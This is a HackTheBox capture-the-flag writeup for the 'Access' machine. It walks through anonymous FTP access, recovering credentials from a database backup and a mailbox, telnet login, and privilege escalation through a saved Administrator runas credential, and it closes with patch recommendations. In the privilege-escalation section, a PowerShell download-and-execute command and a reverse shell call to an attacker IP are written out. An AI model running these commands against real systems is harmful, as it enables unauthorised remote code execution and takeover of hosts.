d3vyce
095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
107 lines
2.8 KiB
Markdown
107 lines
2.8 KiB
Markdown
---
|
|
title: "Writeup - Access (HTB)"
|
|
date: 2022-04-15
|
|
slug: "writeup-access-htb"
|
|
type: "writeup-ctf"
|
|
---
|
|
|
|
This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site.
|
|
|
|
## Enumeration
|
|
|
|
First, let's start with a scan of our target with the following command:
|
|
|
|
|
|
```bash
|
|
nmap -sV -T4 -Pn 10.10.10.98
|
|
```
|
|
Three TCP ports are discovered:
|
|
|
|
|
|
|
|
- 21/tcp : FTP
|
|
- 23/tcp : telnet
|
|
- 80/tcp : HTTP web server (httpd 7.5)
|
|
|
|
|
|
|
|
## Exploit
|
|
|
|
In the `nmap` scan we find an FTP server, let's try to connect as `anonymous`.
|
|
|
|
|
|
|
|
There are 2 folders in which we find the following files:
|
|
- Access Control.zip
|
|
- backup.mdb
|
|
|
|
{{< alert >}}
|
|
Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`To read the contents of the backup file I use the command `mdb-tables`:
|
|
{{< /alert >}}
|
|
|
|
|
|
|
|
In the different tables I find `auth_user`, interesting there could be credencial for an account.
|
|
|
|
|
|
|
|
I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive.
|
|
|
|
In the archive I find a `.pst`. To read its contents I use the following command:
|
|
|
|
|
|
```bash
|
|
readpst Access\ Control.pst -M
|
|
```
|
|
Among the different mails I find the following content:
|
|
|
|
|
|
|
|
A new password ! I try to connect to the telnet server with these credencials.
|
|
|
|
|
|
|
|
I now have a shell as `security` and I can get the first flag.
|
|
|
|
|
|
|
|
## Privilege escalation
|
|
|
|
After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command! A runas with the user `Administrator`.
|
|
|
|
|
|
|
|
I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell Admin. So I get this file and I add the following line at the end of the file.
|
|
|
|
|
|
```bash
|
|
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234
|
|
```
|
|
I then launch a web server on my machine.
|
|
|
|
|
|
```bash
|
|
python3 -m http.server 80
|
|
```
|
|
Then I download/run the script with the admin runas.
|
|
|
|
|
|
```bash
|
|
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')"
|
|
```
|
|
I now have a reverse shell as Administrator!
|
|
|
|
|
|
|
|
So I can get the last flag back.
|
|
|
|
|
|
|
|
## Recommendations
|
|
|
|
To patch this host I think it would be necessary to perform a number of actions:
|
|
|
|
- Do not let the `anonymous` user enable in FTP server configuration
|
|
- Do not store sensitive information in a folder accessible by several people via FTP/web/...
|
|
- Do not give runas Administrator permission to a user
|